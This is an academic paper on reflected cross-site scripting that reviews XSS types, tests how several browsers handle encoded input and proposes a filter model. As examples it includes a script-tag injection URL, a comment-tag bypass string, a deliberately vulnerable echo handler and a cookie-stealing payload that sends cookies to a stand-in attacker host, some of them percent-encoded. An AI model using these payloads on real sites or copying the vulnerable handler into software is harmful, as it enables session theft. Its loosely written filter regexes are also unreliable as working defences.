International Research Journal of Computer Science and Information Systems (IRJCSIS) Vol. 2(2) pp. 25-33, March, 2013
Available online at http://www.interesjournals.org/IRJCSIS
Copyright © 2013 International Research Journals

Full Length Research Paper

Reflected XSS Vulnerability Analysis

Tanko Ishaya*1, Yunxi Zhang2 and Darren Stephens3

1Department of Computer Science, University of Jos, Jos, Nigeria.
2,3University of Hull, Scarborough Campus, Filey Road, Scarborough, YO11 3AZ, United Kingdom.
*Corresponding Author Email: ishayat@unijos.edu.ng

Accepted February 26, 2013

The use of web applications has become an integral part of every aspect of human life. However, vulnerabilities within these systems have been (and will continue to be) a major concern in web application security. Amongst them, Cross-Site Scripting (XSS) is a prevailing vulnerability, since such attacks are generally easy to execute but difficult to detect and prevent. There are three categories of XSS attack: DOM-based, stored and reflected. Attackers commonly use reflected XSS as an initial attempt at stealing session tokens because it is the simplest of the three categories. This paper presents an evaluation of browser-related vulnerabilities and the countermeasures available to web developers, and proposes a model for dynamically enhancing reflected XSS protection mechanisms.

Keywords: Security, XSS vulnerability, XSS attacks, XSS protection mechanisms, Trustworthiness.

1. INTRODUCTION

The use of web applications has become an integral part of every aspect of human life. It has become a dominant way to provide access to online services (Gollmann, 2008), and the JavaScript language standardised by ECMA (ECMA-262, 2009) is widely used to enhance dynamic client-side behaviour. JavaScript code, which is usually downloaded and automatically executed on the fly by an embedded interpreter, has become a possible vector of attacks against web applications. Thus, these applications come with a large number of security challenges that often threaten their trustworthiness. While these security challenges have been (and are being) addressed, security issues within web applications are still a major concern and should be treated as a high priority (Ahmed, 2002; Taniar and Rahayu, 2003; Loo, 2007; Weske et al., 2007). White Hat Security stresses that 82% of sites have suffered one kind of web attack or another (Network Security, 2008), and a number of web sites are reported to be vulnerable to various attacks (Christey and Martin, 2007; Ollmann, 2008). The reason for this severe situation is perhaps the varying security background and experience of web application developers.

To protect the client side from malicious JavaScript code, browsers use a sandboxing mechanism that limits a script to accessing only resources associated with its origin site. Unfortunately, JavaScript code may be confined by the sandboxing mechanism and conform to the same-origin policy, yet still violate the security of the system when a user is lured into downloading malicious JavaScript code (previously created by an attacker) from a trusted website – an exploitation technique that is often called a Cross-Site Scripting (XSS) attack (Robert, 2010). XSS is currently number two in the 2010 OWASP Top Ten vulnerabilities (http://www.owasp.org/index.php/OWASP_Top_Ten_Project).
XSS vulnerabilities were found in as many as 91% of web applications, meaning that roughly nine out of ten web applications are vulnerable to such a flaw, making it possible for attackers to access clients' data without any authorised privileges (Stuttard and Pinto, 2008). Other attacks, such as information leakage and broken access control, also rank highly. It has been pointed out that XSS attacks are detected by a number of commercial sites every month (Lee, 2002). One current approach for dealing with XSS attacks is fixing the server-side vulnerability, but this leaves the client open to abuse if the vulnerable web site is unable to fix the security issue. A complementary approach is therefore required that recognises malicious JavaScript code downloaded from a trusted web site, in order to protect the client environment from XSS attacks. Such an approach should be able to dynamically filter and sanitise different malicious code inputs. This paper presents a model for creating such client-side solutions to mitigate reflected XSS attacks.

The remainder of the paper is structured as follows. Section 2 presents a review of XSS attacks, with an evaluation of the types of XSS attack. Section 3 presents an evaluation of the current challenges hindering filters from sanitising reflected XSS vulnerabilities. Conclusions on the characteristics of reflected XSS vulnerabilities are drawn in Section 4. Section 5 presents the proposed model and describes the technique used for identifying possible malicious reflected XSS attacks. Finally, Section 6 presents conclusions and the further work being carried out.

2. REVIEW OF XSS ATTACKS

An XSS attack is an elevation-of-privilege attack that exploits clients' trust in a web server, where an attacker passes malicious code to the client via the trusted site, evading the client's origin-based security policy. These attacks can be persistent or non-persistent, with the three main categories being reflected XSS, stored XSS and DOM-based XSS. Many of these attacks take advantage of the authentication mechanisms employed by modern browsers, which require users to provide their tokens to a web application only once per session. Upon initial authentication, browsers cache the user's credentials and offer them on behalf of the user for every further request to the site until the session expires. The attacks also take advantage of loopholes in the Same Origin Policy (SOP).

2.1. Reflected XSS Attacks

Reflected (also known as non-persistent) XSS attacks exploit web site elements that echo client-supplied data, such as forms. The vulnerability allows an attacker to generate a crafted URL (containing malicious script code) and lure the victim into believing that the URL is credible. The crafted URL is normally sent to victims by email, web advertising and other means of social engineering. Once a victim navigates to the URL, the attacker's code is executed using the victim's tokens (taking advantage of the implicit authentication mechanism). This type of attack is usually used to read stored passwords and cookies, log keystrokes and change the contents of the page. The URL http://targetwebsite.co.uk/login.php?user=<script>alert(document.cookie);</script> is an example of how an attacker uses a reflected XSS vulnerability to steal the session token from a victim. The victim's browser would interpret the response as an HTML page containing a piece of JavaScript code. When executed, it would allow cookies belonging to www.targetwebsite.co.uk to be stolen. These cookies are then used as a session token for authenticating with the server.
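To make the reflection concrete, the sketch below shows a minimal, hypothetical server-side handler that behaves like the vulnerable login page above. Node.js with the Express framework is assumed purely for illustration; the paper does not name a server technology, and the route and parameter names simply mirror the example URL.

  // Hypothetical vulnerable handler: the client-supplied "user" value is
  // echoed straight into the HTML response without any sanitisation, so
  // <script>alert(document.cookie);</script> executes in the victim's browser.
  const express = require("express");
  const app = express();

  app.get("/login.php", (req, res) => {
    res.send("<p>Welcome back, " + req.query.user + "</p>");
  });

  app.listen(3000);

Because the payload travels in the request and is reflected immediately in the response, nothing malicious is ever stored on the server, which is what distinguishes this category from stored XSS.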
There are three key issues to be analysed from this scenario. Firstly, the vast majority of ordinary users have no way of knowing whether or not a URL is trustworthy. Secondly, the nature of web applications causes them to be vulnerable, since malicious code can be initiated from the client side by anyone (OWASP, 2009). Thirdly, the script code will execute unless there is a filter in the web application that can check its trustworthiness.

2.2. Stored XSS Attacks

A stored XSS attack (also known as persistent XSS) (Kemp, 1998) allows attackers to permanently store malicious JavaScript code on the target server (e.g. in a database or message forum). Attackers then use the code to perform a number of browser-based attacks, including capturing sensitive information from application users, hijacking users' browsers and port-scanning to deliver browser-based exploits. Stored XSS attacks focus on input that is stored in the back end and later displayed by the application. It is particularly dangerous if users with high privileges suffer this kind of attack.

2.3. DOM-Based XSS Attacks

In comparison with reflected and stored XSS vulnerabilities, DOM-based XSS vulnerabilities are slightly different, as they rely on the use of the Document Object Model (DOM) of a page. Such an attack occurs if the JavaScript code in the page can access a URL parameter and use it to write HTML to the page (Klein, 2005). However, since it is a relatively new branch of XSS, it is not yet very widespread in real web applications (OWASP, 2008).

3. DIFFICULTY IN DEFENDING AGAINST XSS ATTACKS

The YGN Ethical Hacker Group (YGN Ethical Hacker Group, 2008) stresses that XSS vulnerabilities are quite difficult to defend against completely, since a number of variables need to be taken into consideration. Because of these variables, it is difficult to address XSS vulnerabilities with a single generalised solution. Instead, a number of mechanisms that can help reduce the likelihood of attack are required. The following sections highlight some of these variables/factors.

3.1. Encoding Schemes

An arbitrary URL containing script code that is not encoded can easily be recognised if users have basic knowledge of XSS vulnerabilities. However, if the URL is encoded, it becomes far harder for users to recognise such an attack. The example below shows the difference between a URL in plain text and the same URL in an encoded format. The plain-text URL is

http://portal.example/index.php?sessionid=12312312&username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>

and the corresponding encoded URL is

http://portal.example/index.php?sessionid=12312312&username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E

Most users do not even consider what the encoded URL might mean. The aim of using an encoded URL is to bypass the XSS filter within the web application with a higher likelihood of success.
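As a hedged illustration of how such an encoded URL might be produced, the short JavaScript sketch below percent-encodes every character of the payload; the helper name encodeAll is hypothetical and is not taken from the paper.

  // Percent-encode every character of the payload, as in the encoded URL above.
  function encodeAll(s) {
    return [...s]
      .map((c) => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0"))
      .join("");
  }

  const payload =
    "<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>";
  console.log(
    "http://portal.example/index.php?sessionid=12312312&username=" + encodeAll(payload)
  ); // prints the %3C%73%63... form shown above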
3.2. Anti-comment design flaws

Anti-comment is a measure that is capable of filtering some malicious code by commenting it out. However, intelligent attackers can design certain types of code to circumvent this filter. Ollmann (2008) provides some example code that comments malicious code out. In the filter, code such as "<script>code</script>" will be detected and have comment tags added around it, converting it to:

<!--
code   // code here will not execute because it is inside the comment tags
-->

Due to the poor design of the anti-comment measure, attackers can craft code such as

><//--><script>code</script><!--><

so that, after the comment tags are added, the new code becomes

<!--><//-->              // comment
<script>code</script>    // malicious code will still execute
<!--><//-->              // comment

The flaws in a poor anti-comment design can therefore allow attackers to send malicious code that still executes as usual.

3.3. Browser versions

The client browser is one of the factors that can give rise to XSS vulnerabilities. Script code that causes potential XSS vulnerabilities demonstrates that some script code can run on several browsers, whilst other code can only run on a certain browser version. In addition, the latest browser versions are less vulnerable to different attacks than previous versions.

3.4. Potentially dangerous tags

A typical XSS vulnerability is triggered when a user clicks on a link. However, XSS code embedded in certain tags (such as IMG or IFRAME) can execute automatically if the code is sent by e-mail. This type of XSS vulnerability is regarded as more devastating, since the code can run without being explicitly activated.

3.5. Default recognition of non-standard XHTML code

One of the conveniences offered by browsers is that non-standard XHTML code can be recognised. Code like <input type=text> does not comply with the W3C standard, as no quotation marks surround the value 'text' of the attribute 'type', and the missing slash means that the end of the 'input' tag is not signified. However, a majority of current browsers (e.g. IE, Firefox) are designed to understand non-standard XHTML code and to treat it as though it were correct. This leniency of browsers therefore introduces vulnerabilities that attackers can exploit.

3.6. Variant code

Another factor is the variation of code: code that is new to a filter will not be treated as malicious. New variants of XSS code can be generated to bypass the validation performed by filters within web applications. Current methods for creating new variant XSS code use different encoding schemes or quotes, as described in Fisher (2004).

From the analysis of these varying factors, web developers need to understand and provide approaches for defending against XSS vulnerabilities. The obstacle, in essence, is that a number of loosely related points must be considered together, which web developers may find frustrating to fuse into a single defence. Furthermore, if the security level of the GET method and the POST method is the same, the GET method may be preferred because of its strength in processing requests more quickly. A robust filter model that can sanitise malicious script code in the GET method, guarding against reflected XSS vulnerabilities, is therefore clearly desirable. Section 4 presents experiments that characterise reflected XSS vulnerabilities, and Section 5 presents the proposed filtering model.
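To illustrate why these factors resist a single generalised check, the sketch below (illustrative function names, not code from the paper) shows a naive substring blacklist being bypassed by two of the variations discussed above.

  // A naive blacklist that only catches one exact spelling of the script tag.
  function naiveFilter(input) {
    return !input.includes("<script>"); // true means "allow"
  }

  console.log(naiveFilter("<script>alert(1)</script>"));         // false: blocked
  console.log(naiveFilter("<SCRIPT>alert(1)</SCRIPT>"));         // true: bypassed by case variation
  console.log(naiveFilter("%3Cscript%3Ealert(1)%3C/script%3E")); // true: bypassed by URL encoding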
4. EXPERIMENTATION FOR DETECTING CHARACTERISTICS OF REFLECTED XSS VULNERABILITIES

In order to develop the conceptual model, a series of tests was undertaken with four browsers (IE7 and IE8, Firefox 3.5.2, Safari 4.0.3 and Opera 9.6.4), which were the latest versions at the time of the research. The experimental results demonstrate some characteristics of reflected XSS vulnerabilities, and conclusions are drawn in section 4.1. Two observations stand out:

• Direct input of malicious code in a URL, or refreshing the page, can be detected by IE8, but the same code cannot be recognised if it is contained in a link.
• Opera 9.6.4 suffers from more variations of reflected XSS vulnerabilities.

4.1. Characteristics of reflected XSS attacks

The observed characteristics of reflected XSS attacks include the following.

1) Encoding schemes. The five encoding schemes used in the tests were HTML-decimal, HTML-hex, URL, UTF-8 and the HTML special encoding for five mark-ups (Skorkin, 2009). Their main characteristics are:

• HTML-encoding-decimal uses "&#" as a starting tag and a semicolon as an end tag, with the decimal number in between (e.g. &#65; is the encoded format of ASCII No. 65, uppercase A).
• HTML-encoding-hex is similar to the decimal format, with the starting tag "&#x". The end tag is also a semicolon, and a hexadecimal number is used in between. For instance, &#x41; is the encoded format of ASCII No. 65, uppercase A.
• URL-encoding and UTF-8 encoding are similar to each other: the per cent sign "%" is used as a starting tag followed by a hexadecimal number. The difference between them is that URL-encoding uses uppercase A-F, whereas lowercase a-f is adopted by UTF-8 encoding. Neither scheme has an end tag (e.g. a semicolon).
• The encoded form of a character is always longer than the original character.

The fifth encoding scheme is the HTML encoding, which defines five special representations for HTML mark-ups.

2) Special ASCII characters. Special ASCII characters, listed by decimal number (No. 9 horizontal tab (HT), No. 10 line feed (LF), No. 11 vertical tab (VT), No. 12 form feed (FF), No. 13 carriage return (CR) and No. 32 space (SPACE)), display oddly in a web page. The second test therefore identifies how they are displayed in different browsers when encoded in four different encoding schemes.

• IE7, Firefox 3.5.2 and Safari 4.0.3 decode both the decimal and hex formats of these ASCII characters and filter them automatically, displaying them as nil. The URL and UTF-8 forms are not decoded and are displayed directly.
• The majority of the test results in Opera 9.6.4 are the same as those in Firefox 3.5.2 and Safari 4.0.3, except that the result for FF differs.
• The results for VT and FF in IE8 do not pop up a window, which differs from the other browsers.
• Most importantly, all the browsers (in the versions chosen for the test) understand both the standard format and the non-standard format.
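The encoding characteristics listed under items 1) and 2) can be illustrated with a small JavaScript sketch. It simply prints the encoded forms of the character "<" described above (the same approach applies to the special ASCII characters such as HT, No. 9) and is provided for illustration only.

  const ch = "<";                 // try also "\t" (ASCII No. 9) or " " (No. 32)
  const code = ch.charCodeAt(0);
  console.log("HTML encoding (mark-ups only):", "&lt;");
  console.log("HTML-encoding-decimal        :", "&#" + code + ";");                             // &#60;
  console.log("HTML-encoding-hex            :", "&#x" + code.toString(16).toUpperCase() + ";"); // &#x3C;
  console.log("URL-encoding                 :", "%" + code.toString(16).toUpperCase());         // %3C
  console.log("UTF-8 encoding               :", "%" + code.toString(16).toLowerCase());         // %3c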
3) Variations of script code.

• The script code has to begin with a starting tag "<script>" and finish with an end tag "</script>", with no space between any two letters, except that a space is permitted before the ">" in both the starting tag and the end tag.
• The starting tag and end tag can be uppercase, lowercase or even mixed case.
• Browsers understand the five special characters encoded by HTML-encoding. For instance, the character "<" is encoded as "&lt;".
• Browsers understand characters encoded by HTML-encoding-decimal or HTML-encoding-hex, and the encoded character is recognised with or without a semicolon as the end tag.
• Browsers understand characters encoded by URL encoding or UTF-8 encoding when they appear in the content part rather than in the tag part.
• Browsers filter HT, LF and CR if they are encoded by HTML-encoding-decimal or HTML-encoding-hex.
• SPACE encoded by HTML-encoding-decimal or HTML-encoding-hex is treated as a space, so the script will not execute if the space appears in the tag part.
• VT and FF encoded by HTML-encoding-decimal or HTML-encoding-hex are treated as a space in the majority of browsers, except Safari 4.0.3, which treats them as nil.
• Browsers cannot understand the five characters encoded by HTML-encoding when the semicolon end tag is missing.
• Calling an external script file can also trigger reflected XSS vulnerabilities.

5. THE PROPOSED MODEL

The conceptual model for filtering reflected XSS vulnerabilities is designed based on the analysis of the experimental results and the conclusions presented in section 4. The model, shown in Figure 1, consists of a number of steps, each leading to the next.

Figure 1. Conceptual Model of the Reflected XSS Filter

5.1. Browser Checking

The first step is to detect the browser type and version, since the latest browser versions are less vulnerable to some attacks (see the conclusions in section 4.1) and the majority of users may not check whether they are using the latest version.

5.2. Request Length Checking

The second step is to check the length of the request sent from the user's browser, to see whether it is longer than the pre-set maximum length. If an attacker attempts to use an encoding scheme to hide the original request, the request length must be longer than that of the original request displayed in plain text (see section 4.1).
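A minimal sketch of these first two steps is given below. The maximum length, the user-agent patterns and the function names are assumptions made for illustration only, since the paper does not prescribe concrete values.

  const MAX_REQUEST_LENGTH = 256;                                // hypothetical pre-set maximum
  const OUTDATED_BROWSERS = [/MSIE [1-7]\./, /Firefox\/[12]\./]; // hypothetical "old version" patterns

  // Step one: flag browsers that are known to be outdated and hence more vulnerable.
  function browserIsCurrent(userAgent) {
    return !OUTDATED_BROWSERS.some((pattern) => pattern.test(userAgent));
  }

  // Step two: reject requests longer than the pre-set maximum, since encoded
  // payloads are always longer than their plain-text equivalents (section 4.1).
  function requestLengthIsAcceptable(url) {
    return url.length <= MAX_REQUEST_LENGTH;
  }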
5.3. Request Decoding

The third step is to analyse the request and check how many encoding schemes have been used; the relevant encoding scheme is then used to decode the encoded characters. An attacker usually encodes a request so that users are unable to ascertain its validity. In addition, the traditional decoding functionality in web applications assumes that the request is encoded with a single encoding scheme, so the same scheme is used to decode it. However, if different parts of one request are encoded with different encoding schemes (see section 4.1), the traditional decoding functionality will fail to sanitise malicious script code.

1) Analysis mechanism. Since characters encoded by the encoding schemes can be arranged randomly and repeatedly, this section introduces an analysis mechanism capable of distinguishing the different schemes. The procedure of the analysis mechanism is as follows.

After a request is sent to the web application, it is divided into several parts by parameter: the value of one parameter is one part. For instance, a request like http://xxx.co.uk/index.php?id=abc&pwd=123 is divided into two parts, since there are two parameters, id and pwd, with values abc and 123 respectively. Each part is then checked by the analysis mechanism. A pointer is set to the first character of the part. The mechanism checks whether this character is a special character of one of the pre-set standards. If it is, a certain number of the following characters (the maximum sample length among the pre-set standards) is fetched and matched against the pre-set standards one by one. If some or all of these characters match one of the pre-set standards, they are grouped and sent to an input-output matching table; the output is stored in a new container, and the pointer moves to the character after the last character of the group. If the character at the pointer does not match any of the pre-set standards, the character is stored in the container and the pointer moves to the next character. The procedure continues until the pointer reaches the last character of the part.

Limitation: the analysis mechanism proposed here only works under the following prerequisites: the form/style of each pre-set standard is distinct, in particular starting with a characteristic character, and each pre-set standard has an exact maximum length. Part of the procedure is illustrated in Figures 2, 3 and 4.

Figure 2. Step one of the analysis mechanism
Figure 3. Step two of the analysis mechanism
Figure 4. Step three of the analysis mechanism

2) Application of the analysis mechanism. This section explains how the decoding functionality can be achieved by using the analysis mechanism to filter an encoded URL. First, the pre-set standards are defined by calculating the length ranges of the five encoding schemes, listed below based on the characteristics in section 4.1.

Group one:
• HTML-encoding: 4 (&lt;) to 6 (&quot;)
• HTML-encoding-decimal: 3 (&#9) to 6 (&#126;)
• HTML-encoding-hex: 4 (&#x9) to 6 (&#x7E;)

Group two:
• URL-encoding: 2 (%9) to 3 (%7E)
• UTF-8: 2 (%9) to 3 (%7e)

The maximum lengths for the two groups are six and three respectively. When the pointer is at the first character, only the five characters following it need to be fetched for the first group, and two for the second group. Regular expressions for the five encoding schemes are used as the pre-set standards because of their strength in matching strings. They are designed based on the characteristics presented in section 4.1; in particular, two of the three HTML encodings can still be recognised by browsers even if the semicolon is missing. Combining these characteristics, the pre-set standards are designed as follows:

• HTML-encoding: /&[aglmopqstu]{2,4};/
• HTML-encoding-decimal: /&#[\d]{1,3};?/
• HTML-encoding-hex: /&#x[\x00-\xFF];?/
• URL-encoding and UTF-8 encoding: /%[\x00-\xFF]/

The special character used in the decoding mechanism is "&" or "%", as dictated by the regular expressions above. Each encoding-scheme character table is used as a specific input-output matching table, and the container is named "sanitisedText". Part of the procedure is illustrated in Figures 5, 6 and 7.

Figure 5. First step of the analysis mechanism
Figure 6. Second step of the analysis mechanism
Figure 7. Third step of the analysis mechanism

5.4. Malicious Code Checking and Escaping

The fourth step checks whether the request string conforms to the characteristics of reflected XSS vulnerabilities. From the conclusions in section 4.1, all of the lowercase, uppercase and mixed-case spellings of the script tag can execute, so the request should first be converted to a single case for convenience of analysis. The conclusions in section 4.1 also demonstrate that ASCII characters 9-13 can be interpreted as a space or as nil by browsers; for convenience when utilising the analysis mechanism, these characters should be removed as well. Finally, the conclusions in section 4.1 indicate that both pure script code and external script files can execute with a complete pair of tags "<script></script>", but cannot execute if there is a space between "<" and "script" in the starting tag. The solution, therefore, is that whenever characters such as "<script" are found, a space is inserted after the "<" character to deliberately break the balance of the tag pair.
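The sketch below pulls steps three and four together. It is a simplified adaptation rather than the exact filter implemented in the paper: the regular expressions are adjusted versions of the pre-set standards above (narrowed to hexadecimal digits), and the function and variable names are assumptions for illustration.

  // Step three: decode the five encoding schemes described in section 5.3.
  const NAMED = { "&lt;": "<", "&gt;": ">", "&amp;": "&", "&quot;": "\"", "&apos;": "'" };

  function decodeRequest(text) {
    return text
      // HTML encoding of the five special mark-ups (semicolon required, per section 4.1).
      .replace(/&(lt|gt|amp|quot|apos);/gi, (m) => NAMED[m.toLowerCase()])
      // HTML-encoding-decimal, semicolon optional.
      .replace(/&#(\d{1,3});?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
      // HTML-encoding-hex, semicolon optional.
      .replace(/&#x([\da-f]{1,2});?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      // URL-encoding and UTF-8 encoding (upper- or lower-case hex digits).
      .replace(/%([\da-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  }

  // Step four: normalise the case, drop ASCII 9-13, and break the tag pair by
  // inserting a space after "<" wherever "<script" is found (section 5.4).
  function sanitiseRequest(text) {
    const decoded = decodeRequest(text).toLowerCase().replace(/[\x09-\x0d]/g, "");
    return decoded.replace(/<script/g, "< script");
  }

  // Example: the crafted login URL from section 2.1.
  console.log(sanitiseRequest("login.php?user=%3Cscript%3Ealert(document.cookie);%3C/script%3E"));
  // -> "login.php?user=< script>alert(document.cookie);</script>"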
6. CONCLUSION AND FUTURE WORK

An implementation of the conceptual model, running on Windows Vista Home Premium (Service Pack 2), has been developed for evaluation. The verification procedure was divided into two phases.

The first phase: (a) execute the browser checking function and (b) execute the request length checking function.

The second phase: (a) display the original request, (b) execute the request decoding function, (c) display the resulting request after the decoding function, (d) execute the request checking function, (e) display the resulting request after the checking function, (f) execute the request escaping function and (g) display the resulting request after the escaping function.

The reason for separating the second phase from the first is that the remaining functionality does not execute if the second step in the first phase rejects the request; in other words, none of the steps in the second phase run, so their effects cannot be displayed.

The result of the first phase was that test data did not execute if the pre-set maximum length was less than the length of the request, across the four browsers with their different versions; the browser version was also detected correctly. Therefore, the first phase was verified as successful. When the test data were evaluated in the second phase, all of them were escaped effectively at step (f). Thus, the conceptual model has been shown to be effective in discovering various forms of malicious script code and filtering them accordingly.

The strengths of the model are: (a) it successfully identifies the five encoding schemes introduced in this paper, as well as special characters such as space and ASCII No. 9-13, and proper sanitisation escapes potential script code tags in the request so as to invalidate the malicious script code inside; (b) if new encoding schemes with a distinct starting and end tag come to be recognised by browsers, they can easily be adopted into the filter as new decoding schemes; and (c) the analysis mechanism created in this paper can be utilised not only for decoding but also for further functionality, provided its conditions (pre-set standards, pre-defined special characters etc.) are fulfilled correctly.

The weakness of the model is that only four representative browsers have been used so far, and new versions of these browsers have been published since the tests were conducted. There is therefore no guarantee that the results presented here will be the same with newer versions of these browsers. Future work will focus on how the model can be applied to new versions of these browsers.

REFERENCES

Ahmed M (2002). ASP.NET Web Developer's Guide. Rockland: Syngress Publishing, Inc.
Christey S, Martin R (2007). Vulnerability type distributions in CVE.
ECMA-262 (2009). ECMAScript Language Specification.
Fisher J (2004). Cross Site Scripting in vBulletin forum software.
Gollmann D (2008). Securing Web applications. Information Security Technical Report, 13, 1-9.
Kemp A (1998). Persistent Client State HTTP Cookies.
Klein A (2005). DOM Based Cross Site Scripting or XSS of the Third Kind.
Lee P (2002). Cross-site scripting: Use a custom tag library to encode dynamic content.
Loo A (2007). Peer-to-Peer Computing: Building Supercomputers with Web Technologies. Springer.
Network Security (2008). Web security flaws up. Network Security, 2008(9), 20.
Ollmann G (2008). HTML Code Injection and Cross-site Scripting: Understanding the cause and effect of CSS (XSS) Vulnerabilities.
OWASP (2008). OWASP Testing Guide V3.0.
OWASP (2009). Cross-site scripting.
Robert A (2010). Cross Site Scripting.
Skorkin A (2009). Different Types of Encoding Schemes – A Primer.
Stuttard D, Pinto M (2008). The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws. Indianapolis: Wiley Publishing, Inc.
Taniar D, Rahayu J (2003). Web-Powered Databases. London: Idea Group Publishing.
Weske M, Hacid M, Godart C (2007). Web Information Systems Engineering – WISE 2007 Workshops. Berlin Heidelberg: Springer-Verlag.
YGN Ethical Hacker Group (2008). What malicious things XSS can do.